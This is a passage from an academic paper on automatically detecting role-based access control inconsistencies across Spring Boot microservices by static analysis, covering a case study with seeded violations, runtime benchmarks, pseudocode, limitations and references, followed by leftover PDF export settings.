Harman, 2011) for each type of violations that resulted in a total of seven RBAC violations. Our system successfully detected all those violations and provided a report with specific locations of the violations. In this section, we will discuss how our analysis process works in detail for the mutated application. The TMS project utilizes an annotation-based configuration technique to define application layers. REST API configurations and RBAC restrictions are also applied through annotations, which are common practice for enterprise applications. Table 2 lists frequently used annotations throughout the TMS project. For our purpose, we only looked for the @RestController annotation in the discovery module. The HTTP and paths type were extracted from the parameters of @RequestMapping annotation or subtype annotations. Paths can be defined at both class level or method level. We aggregated the class level paths with method-level paths to get the final path for each endpoint. The endpoints’ request and response types are SuperAdmin ReviewerModerator GuestUserAdmin Figure 4 Role hierarchy tree of the TMS application. Full-size DOI: 10.7717/peerj-cs.376/fig-4 Table 2 Annotations used in TMS project. Annotation Target Description @Controller 3 Class 3 Indicates controller, service, and repository layers @Service @Repository @RestController Class Sub type of @Controller to activate REST APIs @RequestMapping Class and Method Defines HTTP types and paths for REST endpoints @GetMapping 3 Method 3 Sub types of @RequestMapping for specific HTTP types @PostMapping @DeleteMapping @RolesAllowed Method Lists a set of allowed roles Das et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.376 14/24 http://dx.doi.org/10.7717/peerj-cs.376/fig-4 http://dx.doi.org/10.7717/peerj-cs.376 https://peerj.com/computer-science/ resolved by detecting parameters and return types of respective methods where the endpoints are defined. Finally, the RBAC roles are listed by detecting the parameters of the @RolesAllowed annotation applied to each endpoint method. The RestTemplate class is usually used for making REST calls in the Spring Boot applications where the methods getForObject, postForObject, deleteForObject, etc. are used for performing REST calls with specific HTTP type. Each of those methods takes a URL parameter and a request object and returns a response object. We scan classes annotated with @Service annotation and filter them if they contain RestTemplate in their import statements to detect service layer REST calls. We then look for the methods described above and detect request and response types by checking the parameter type and return type. The URLs are detected by performing a backward data flow analysis recursively, as described in the proposed method section. The method calls graph is constructed by traversing each endpoint method to the service layer and repository layer methods. After the discovery module completes gathering metadata for each MSA, the flow matcher module combines them, and the analysis module performs the final analysis. The flow matcher module also generates a visual graph of the REST communications among the microservices using Graphviz library (Ellson et al., 2002). Figure 5 shows the generated graph for the TMS application. Figure 5 Inter microservice REST communications in TMS. Full-size DOI: 10.7717/peerj-cs.376/fig-5 Das et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.376 15/24 http://dx.doi.org/10.7717/peerj-cs.376/fig-5 http://dx.doi.org/10.7717/peerj-cs.376 https://peerj.com/computer-science/ While matching the request and response types, we only considered the supertype of the generic types. For example, List<AClass> and ArrayList<AClass> are considered equal during matching. Our analyzer reported two missing-role violations for the mutated applications by specifying the fully qualified name (MSA name + package name + class name + method name) of the endpoint methods that are defined without specifying any RBAC roles. It detected two unknown-role violations along with their locations. These two violations have resulted from data entry errors where “user” and “admin” roles are mistakenly typed as “usre” and “admin” respectively, which are not present in the role hierarchy shown in Fig. 4. Our analyzer flagged one entity access violation by pointing out a pair of fully qualified method names. Methods getExams and getINITExams in CMS have the same return type List<Exam> and the same HTTP type GET but they have different RBAC roles: “user” and “moderator” respectively. We found two conflicting hierarchy violations in the mutated TMS application. One of them occurred in inter microservice communication, shown in Fig. 6, where the CMS module calls the UMS module to retrieve examinee info. The getExaminee endpoint method in CMS can be accessed with a “user” role which calls the getUserById endpoint method of EMS via service layer REST call. However, the getUserById method in EMS has annotated with the “admin” role, which is a direct ancestor of the “user” role. The second conflicting hierarchy violation, shown in Fig. 7, occurred entirely within the QMS module where both createCategory and deleteCategory endpoint methods ConfigurationController::getExaminee() Roles: {user, admin} Reduction & aggregation: {user} UserInfoController::getUserById() Roles: {admin, superAdmin} Reduction & aggregation: {user, admin} UmsService::getExamineeInfo() Roles: {} Reduction & aggregation: {user} UserRepository::getById() Roles: {} Reduction & aggregation: {user, admin} GET CMS UMS Figure 6 Conflicting hierarchy violation among CMS and UMS. Full-size DOI: 10.7717/peerj-cs.376/fig-6 CategoryController::createCategory() Roles: {user, admin, superAdmin} CategoryController::deleteCategory() Roles: {admin, superAdmin} CategoryRepository::save() Roles: {user, admin} CategoryRepository::delete() Roles: {admin} Figure 7 Conflicting hierarchy violation within QMS. Full-size DOI: 10.7717/peerj-cs.376/fig-7 Das et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.376 16/24 http://dx.doi.org/10.7717/peerj-cs.376/fig-6 http://dx.doi.org/10.7717/peerj-cs.376/fig-7 http://dx.doi.org/10.7717/peerj-cs.376 https://peerj.com/computer-science/ call the save method of CategoryRepository with conflicting roles. Finally, we detected one unrelated access violation between CMS and EMS, where the method getQuestions in CMS has transitive access to the method listAllQuestionsForExam in EMS via service layer REST call. They are annotated with “user” and “moderator” roles, respectively defined in separate subtrees of the role hierarchy. We tested both source code and bytecode version of our discovery module, which utilizes the JavaParser library (Bruggen, 2020) to parse the source code and JavaAssist library (JBoss, 2020) to perform bytecode analysis to extract class definitions. We published our implementation as an open-source tool2,3,4. We ran it against the TMS project for benchmarking our analyzer and separately measured the runtime for each discovery, flow matcher, and analysis modules. For the discovery module, we break down our measurements for each microservice (CMS, QMS, EMS and UMS) and count the number of classes it scanned. Note that the discovery module performs a deep scanning for the controller layer classes that are annotated with @RestController annotation and service layer classes that have RestTemplate import to detect REST endpoints, security roles, and REST calls. For other classes, it performs just a shallow scan to construct the method call graphs. Table 3 shows the total runtime5 for each module and the breakdown for the discovery module for static bytecode analysis. We can immediately see that the discovery module takes the most significant time since it performs scanning of all class files to extract metadata. In contrast, the flow-matcher and the analysis module, operating on the extracted metadata, take comparatively less time. For the discovery module, runtime depends on the number of class files in each microservices. The runtime of the flow- matcher module depends on the number of REST endpoints and the number of REST calls, while the runtime of the analysis module depends on the number of inter- microservice REST connections and the depth of the function call graph. Our experiment exhibits a reasonable runtime to perform the static code analysis for enterprise applications. In total, it took 1.43 seconds against the TMS application, which consists of four microservices, a total of 102 classes, and 11 inter-microservice REST connections. For enterprise applications with many microservices, it is possible to run the discovery module in parallel for multiple microservices, which will significantly reduce the runtime. Table 3 Runtime against TMS testbed. Module Total Time breakdown Name Runtime (s) MSA Time (s) Discovery 1.04 CMS 0.43 EMS 0.18 QMS 0.31 UMS 0.12 Flow Matcher 0.13 – Analysis 0.29 – 2 SAR from bytecode: https://github.com/ cloudhubs/rad. 3 SAR from source code: https://github. com/cloudhubs/rad-source. 4 RBAC analysis: https://github.com/ cloudhubs/rad-analysis. 5 The benchmark is run on a Mac OS computer with a 2.9 GHz 6-core Intel Core i9 processor and 32 GB RAM. Das et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.376 17/24 https://github.com/cloudhubs/rad https://github.com/cloudhubs/rad https://github.com/cloudhubs/rad-source https://github.com/cloudhubs/rad-source https://github.com/cloudhubs/rad-analysis https://github.com/cloudhubs/rad-analysis http://dx.doi.org/10.7717/peerj-cs.376 https://peerj.com/computer-science/ RBACAssessment(pathToMicroservices, roleHierarchy) { // extract metadata for each path in pathToMicroservices { analyze project property files to get service-name, port, hard-coded string values, etc. extract class definition using static code analysis // populate serverList and clientList for each class { for each method { if the method annotated with REST annotations { extract API endpoint definition metadata add extracted metadata to serverList follow each method call to create a method call graph extract RBAC security roles associated with those methods add the graph to methodCallGraph as a subgraph } if the method contains REST API calls { extract API call descriptions e.g. HTTP method, URL, etc. add extracted metadata to clientList } } } } // resolve inter-microservice REST connections for each server in serverList { for each client in clientList { if URL, port, HTTP method matches for server and client { add (server, client) pair to restConnections } } } // update method call graph for each connection in restConnections { add an edge from client to server in methodCallGraph } // reduction for each method in methodCallGraph { keep only the lowest role in roleHierarchy and discard others } // aggregation for each disjoint subgraph in methodCallGraph { traverse all paths and merge the roles from parent to child } // find inconsistencies for each method in methodCallGraph { if the method has conflicting roles according to roleHierarchy { report inconsistency } } } Figure 8 RBAC assessment pseudocode. Full-size DOI: 10.7717/peerj-cs.376/fig-8 Das et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.376 18/24 http://dx.doi.org/10.7717/peerj-cs.376/fig-8 http://dx.doi.org/10.7717/peerj-cs.376 https://peerj.com/computer-science/ To show the performance of our method on larger systems, the pseudocode for our algorithm is given in Fig. 8. The amount of work necessary scales linearly with both the number of methods in the system and with the product of the REST calls and endpoints within the system, meaning our algorithm runs in O(M + E × C), where M is the number of methods, E is the number of REST endpoints, and C is the number of REST calls. Since the number of methods in a system is usually much larger than the number of REST calls and endpoints, our algorithm will usually run in O(M). This is in line with the results of our experiment; the discovery module, which searches every method for the needed metadata, was responsible for the majority of the time taken. THREATS TO VALIDITY There are several threats to the validity of our work to address. Some of these arise from our experiment and some from how generalizable our approach is. Internal threats to validity The primary threats to the validity of our experiment are the accuracy of the violations detected and the accuracy of the performance measures. Since we introduced known mutants for the errors, we know our tool accurately detected all of the issues. Performance- wise, we showed that our tool performed well on a small-sized application, and that the algorithm should scale up well with larger applications since the most expensive portion of the analysis scales only linearly with the number of methods in the project. External threats to validity There are three external threats to our work’s validity, which may affect how generalizable our results are. First, some of the detected inconsistencies might be false positives that is, those might be intentionally left behind by the developers. Second, it depends on a user-defined role hierarchy that is assumed to contain roles universal to the application. This may not be true if users are defined in separate security realms; a role name in one realm may not be equivalent to the same role name in a different realm, either in its own access rights or in its relative position in the role hierarchy. In this case, a mapping would have to be supplied, showing which, if any, roles should be equivalent across the different realms. Another limitation is the use of security annotations. If security policies are implemented differently than through annotations, are defined in a language or a framework that does not support annotations, the current approach would not detect the roles. However, if another method was used to extract allowed roles, they could be used in the rest of the analysis process. CONCLUSION We introduced a novel solution to automatically detect authorization inconsistencies in the RBAC implementation for enterprise applications using automated SAR. Our solution categorizes the violations into five types: missing-role violation, unknown access violation, entity access violation, unrelated access violation, and conflicting hierarchy violation. Our analyzer scans a set of microservice artifacts and provides a report listing all the possible violations by pinpointing their locations and types. While some of Das et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.376 19/24 http://dx.doi.org/10.7717/peerj-cs.376 https://peerj.com/computer-science/ the detected violations may be false-positive, the violation type, along with a specific location, helps the developer easily debug them, fix them, or discard them if they were intentional. Although our analyzer was developed for a JAVA enterprise application, our proposed approach is not restricted to any particular programming language or framework. It can easily be implemented for other languages and frameworks since all modern languages now have a well-structured abstraction for REST APIs and RBAC policies. One major shortcoming of our method is that it assumes the role hierarchy and association of users with roles are defined centrally. However, individual microservices can have separate role hierarchies or even different user-role associations. Similarly, the trust management can be distributed across multiple domains like the dRBAC. In the future, we will extend our system to address these issues to allow multiple role hierarchies and multiple role mappings along with their decentralization. Besides, we like to experiment on role assignment within a user session to identify possible inconsistencies while enforcing DSD. Our long term goal is to perform such analysis within the cloud- native environment commonly used in production deployments, for example, analyzing Dockerfiles and Kubernetes artifacts. ADDITIONAL INFORMATION AND DECLARATIONS Funding This material is based upon work supported by the National Science Foundation under Grant No. 1854049 and a grant from Red Hat Research. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: National Science Foundation: 1854049. Red Hat Research. Competing Interests The authors declare that they have no competing interests. Author Contributions � Dipta Das conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Andrew Walker conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. � Vincent Bushong conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. � Jan Svacina conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. Das et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.376 20/24 http://dx.doi.org/10.7717/peerj-cs.376 https://peerj.com/computer-science/ � Tomas Cerny conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. � Vashek Matyas conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: Data and analysis are available at GitHub, specifically: - Bytecode analysis: https://github.com/cloudhubs/rad. - Source code analysis: https://github.com/cloudhubs/rad-source. - RBAC analysis: https://github.com/cloudhubs/rad-analysis. REFERENCES Ahn G-J, Sandhu R. 2000. Role-based authorization constraints specification. ACM Transactions on Information and System Security 3(4):207–226 DOI 10.1145/382912.382913. Alshuqayran N, Ali N, Evans R. 2018. Towards micro service architecture recovery: An empirical study. In: 2018 IEEE International Conference on Software Architecture (ICSA). Piscataway: IEEE, 47–4709. Alur D, Malks D, Crupi J, Booch G, Fowler M. 2003. Core J2EE patterns (core design series): best practices and design strategies. Second Edition. Santa Clara: Sun Microsystems, Inc. Basin D, Burri SJ, Karjoth G. 2009. Dynamic enforcement of abstract separation of duty constraints. In: Backes M, Ning P, eds. Computer Security—ESORICS 2009. Berlin: Springer, 250–267. Bass L, Clements P, Kazman R. 2003. Software architecture in practice. Boston: Addison-Wesley Professional. Brachmann E, Dittmann G, Schubert K-D. 2012. Simplified authentication and authorization for restful services in trusted environments. In: De Paoli F, Pimentel E, Zavattaro G, eds. Service-Oriented and Cloud Computing. Berlin: Springer, 244–258. Bruggen DV. 2020. JavaParser: analyse, transform and generate your Java codebase. Available at https://javaparser.org (accessed 14 August 2020). Castillo P, Bernier J, Arenas M, Merelo GuervÃs J, GarcÃa-SÃ¡nchez P. 2011. Soap vs rest: comparing a master-slave ga implementation. CoRR. ArVix preprint arXiv:1105.4978v1. Cicchetti A, Di Ruscio D, Iovino L, Pierantonio A. 2013. Managing the evolution of data-intensive Web applications by model-driven techniques. Software & Systems Modeling 12(1):53–83 DOI 10.1007/s10270-011-0193-0. Ciuciu I, Tang Y, Meersman R. 2012. Towards evaluating an ontology-based data matching strategy for retrieval and recommendation of security annotations for business process models. In: Aberer K, Damiani E, Dillon T, eds. Data-Driven Process Discovery and Analysis. Berlin: Springer, 103–119. Ellson J, Gansner E, Koutsofios L, North SC, Woodhull G. 2002. Graphviz—open source graph drawing tools. In: Mutzel P, Jünger M, Leipert S, eds. Graph Drawing. Berlin: Springer, 483–484. Ferraiolo DF, Cugini JA, Kuhn DR. 1995. Role-based access control (RBAC): features and motivations. In: Proceedings of the 11th Annual Computer Security Applications Conference. 241–248. Das et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.376 21/24 https://github.com/cloudhubs/rad https://github.com/cloudhubs/rad-source https://github.com/cloudhubs/rad-analysis http://dx.doi.org/10.1145/382912.382913 https://javaparser.org http://dx.doi.org/10.1007/s10270-011-0193-0 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.376 Freudenthal E, Pesin T, Port L, Keenan E, Karamcheti V. 2002. drbac: distributed role-based access control for dynamic coalition environments. In: Proceedings 22nd International Conference on Distributed Computing Systems. 411–420. Granchelli G, Cardarelli M, Di Francesco P, Malavolta I, Iovino L, Di Salle A. 2017. Towards recovering the software architecture of microservice-based systems. In: 2017 IEEE International Conference on Software Architecture Workshops (ICSAW). Piscataway: IEEE, 46–53. Habib MA, Mahmood N, Shahid M, Aftab MU, Ahmad U, Nadeem Faisal CM. 2014. Permission based implementation of dynamic separation of duty (dsd) in role based access control (rbac). In: 2014 8th International Conference on Signal Processing and Communication Systems (ICSPCS). 1–10. Hunsaker C. 2015. REST vs SOAP: when is REST better for web service interfaces? Available at https://stormpath.com/blog/rest-vs-soap (accessed 14 August 2020). Ibrahim A, Bozhinoski S, Pretschner A. 2019. Attack graph generation for microservice architecture. In: Proceedings of the 34th ACM/SIGAPP Symposium on Applied Computing, SAC ’19. New York: Association for Computing Machinery, 1235–1242. JBoss. 2020. Javassist: java bytecode engineering toolkit. Available at https://www.javassist.org (accessed 14 August 2020). Jendrock E, Evans I, Gollapudi D, Haase K, Srivathsa C, Cervera-Navarro R, Markito W. 2014. Working with realms, users, groups, and roles. In: The Java EE 7 Tutorial. Vol. 2. Boston: Addison-Wesley Professional. Jia Y, Harman M. 2011. An analysis and survey of the development of mutation testing. IEEE Transactions on Software Engineering 37(5):649–678 DOI 10.1109/TSE.2010.62. Lee S, Jo J, Kim Y. 2015. Method for secure restful web service. In: 2015 IEEE/ACIS 14th International Conference on Computer and Information Science (ICIS). 77–81. McGraw G. 2004. Software security. IEEE Security & Privacy Magazine 2(2):80–83 DOI 10.1109/MSECP.2004.1281254. Mohanty H, Mohanty J, Balakrishnan A. 2016. Trends in software testing. Singapore: Springer. Montesi F, Weber J. 2016. Circuit breakers, discovery, and api gateways in microservices. ArXiv preprint arXiv:1609.05830. Mordani R. 2016. JSR 250: common annotations for the JavaTM platform. Available at https://jcp. org/en/jsr/detail?id=250. Oberle D, Eberhart A, Staab S, Volz R. 2004. Developing and managing software components in an ontology-based application server. In: Jacobsen H-A, ed. Middleware 2004. Berlin: Springer, 459–477. Omicini A, Ricci A, Viroli M. 2005. Rbac for organisation and security in an agent coordination infrastructure. Electronic Notes in Theoretical Computer Science 128(5):65–85. Oracle. 2020. Securing RESTful web services using Java security annotations. Available at https://docs.oracle.com/middleware/1212/wls/RESTF/secure-restful-service.htm#RESTF280 (accessed 14 August 2020). Pallets Projects. 2020. Flask documentation quickstart (1.1.x). Available at https://flask. palletsprojects.com/en/1.1.x/quickstart (accessed 14 August 2020). Quay. 2020. Clair: vulnerability static analysis for containers. GitHub. Available at https://github. com/quay/clair (accessed 11 December 2020). Rademacher F, Sachweh S, Zündorf A. 2020. A modeling method for systematic architecture reconstruction of microservice-based software systems. In: Nurcan S, Reinhartz-Berger I, Das et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.376 22/24 https://stormpath.com/blog/rest-vs-soap https://www.javassist.org http://dx.doi.org/10.1109/TSE.2010.62 http://dx.doi.org/10.1109/MSECP.2004.1281254 https://jcp.org/en/jsr/detail?id=250 https://jcp.org/en/jsr/detail?id=250 https://docs.oracle.com/middleware/1212/wls/RESTF/secure-restful-service.htm#RESTF280 https://flask.palletsprojects.com/en/1.1.x/quickstart https://flask.palletsprojects.com/en/1.1.x/quickstart https://github.com/quay/clair https://github.com/quay/clair https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.376 Soffer P, Zdravkovic J , eds. Enterprise, Business-Process and Information Systems Modeling. Cham: Springer International Publishing, 311–326. Rademacher F, Sorgalla J, Wizenty P, Sachweh S, Zündorf A. 2020. Graphical and Textual Model-Driven Microservice Development. Cham: Springer International Publishing, 147–179. Red Hat Inc. 2020a. Keycloak. Available at https://www.keycloak.org (accessed 14 August 2020). Red Hat Inc. 2020b. Keycloak authorization services guide. Available at https://www.keycloak.org/ docs/latest/authorization_services (accessed 14 August 2020). Richards M. 2015. Layered architecture. In: Software Architecture Patterns. Newton: O’Reilly Media, Inc. Salah T, Jamal Zemerly M, Yeun CY, Al-Qutayri M, Al-Hammadi Y. 2016. The evolution of distributed systems towards microservices architecture. In: 2016 11th International Conference for Internet Technology and Secured Transactions (ICITST). 318–325. Sandhu RS. 1990. Separation of duties in computerized information systems. In: DBSec. Halifax: Citeseer, 179–190. Sandhu RS, Coyne EJ, Feinstein HL, Youman CE. 1996. Role-based access control models. Computer 29(2):38–47 DOI 10.1109/2.485845. Sandhu RS, Samarati P. 1994. Access control: principle and practice. IEEE Communications Magazine 32(9):40–48 DOI 10.1109/35.312842. Scarioni C, Nardone M. 2019. Pro spring security: securing spring framework 5 and boot 2-based Java applications. Berlin: Springer. Son S, Mckinley KS, Shmatikov V. 2013. Fix me up: repairing access-control bugs in web applications. In: Network and Distributed System Security Symposium. Srivastava V, Bond MD, McKinley KS, Shmatikov V. 2011. A security policy oracle: detecting security holes using multiple api implementations. In: Proceedings of the 32nd ACM SIGPLAN Conference on Programming Language Design and Implementation, PLDI. New York: Association for Computing Machinery, 343–354. Steinegger R, Giessler P, Hippchen B, Abeck S. 2017. Overview of a domain-driven design approach to build microservice-based applications. In: SOFTENG: The Third International Conference on Advances and Trends in Software Engineering. Sudhakar A. 2011. Techniques for securing rest. CA Technology Exchange 1(3):32–40. Swinhoe D. 2020. The 15 biggest data breaches of the 21st century. Available at https://www. csoonline.com/article/2130877/the-biggest-data-breaches-of-the-21st-century.html (accessed 14 August 2020). Thio L. 2020. Role-based authorization—flask-user v1.0 documentation. Available at https://flask- user.readthedocs.io/en/latest/authorization.html (accessed 14 August 2020). Tihomirovs J, Grabis J. 2016. Comparison of soap and rest based web services using software evaluation metrics. Information Technology and Management Science 19(1):92–97 DOI 10.1515/itms-2016-0017. VMware Inc. 2020. Building a RESTful web service. Available at https://spring.io/guides/gs/rest- service (accessed 14 August 2020). Vural H, Koyuncu M, Guney S. 2017. A systematic literature review on microservices. In: Gervasi O, Murgante B, Misra S, Borruso G, Torre CM, Rocha AMA, Taniar D, Apduhan BO, Stankova E, Cuzzocrea A, eds. Computational Science and Its Applications—ICCSA 2017. Cham: Springer International Publishing, 203–217. Das et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.376 23/24 https://www.keycloak.org https://www.keycloak.org/docs/latest/authorization_services https://www.keycloak.org/docs/latest/authorization_services http://dx.doi.org/10.1109/2.485845 http://dx.doi.org/10.1109/35.312842 https://www.csoonline.com/article/2130877/the-biggest-data-breaches-of-the-21st-century.html https://www.csoonline.com/article/2130877/the-biggest-data-breaches-of-the-21st-century.html https://flask-user.readthedocs.io/en/latest/authorization.html https://flask-user.readthedocs.io/en/latest/authorization.html http://dx.doi.org/10.1515/itms-2016-0017 https://spring.io/guides/gs/rest-service https://spring.io/guides/gs/rest-service https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.376 Wagh DK, Thool R. 2012. A comparative study of soap vs rest web services provisioning techniques for mobile host. Journal of Information Engineering and Applications 2:12–16. Walker A, Svacina J, Simmons J, Cerny T. 2020. On automated role-based access control assessment in enterprise systems. In: Kim KJ, Kim H-Y, eds. Information Science and Applications. Singapore: Springer, 375–385. Walls C. 2016. Spring boot in action. First Edition. Shelter Island: Manning Publications Co. Xu D, Thomas L, Kent M, Mouelhi T, Le Traon Y. 2012. A model-based approach to automated testing of access control policies. In: Proceedings of the 17th ACM Symposium on Access Control Models and Technologies, SACMATTM 12. New York: Association for Computing Machinery, 209–218. Das et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.376 24/24 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.376 On automated RBAC assessment by constructing a centralized perspective for microservice mesh Introduction Related work Proposed method Case study Threats to validity Conclusion References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA 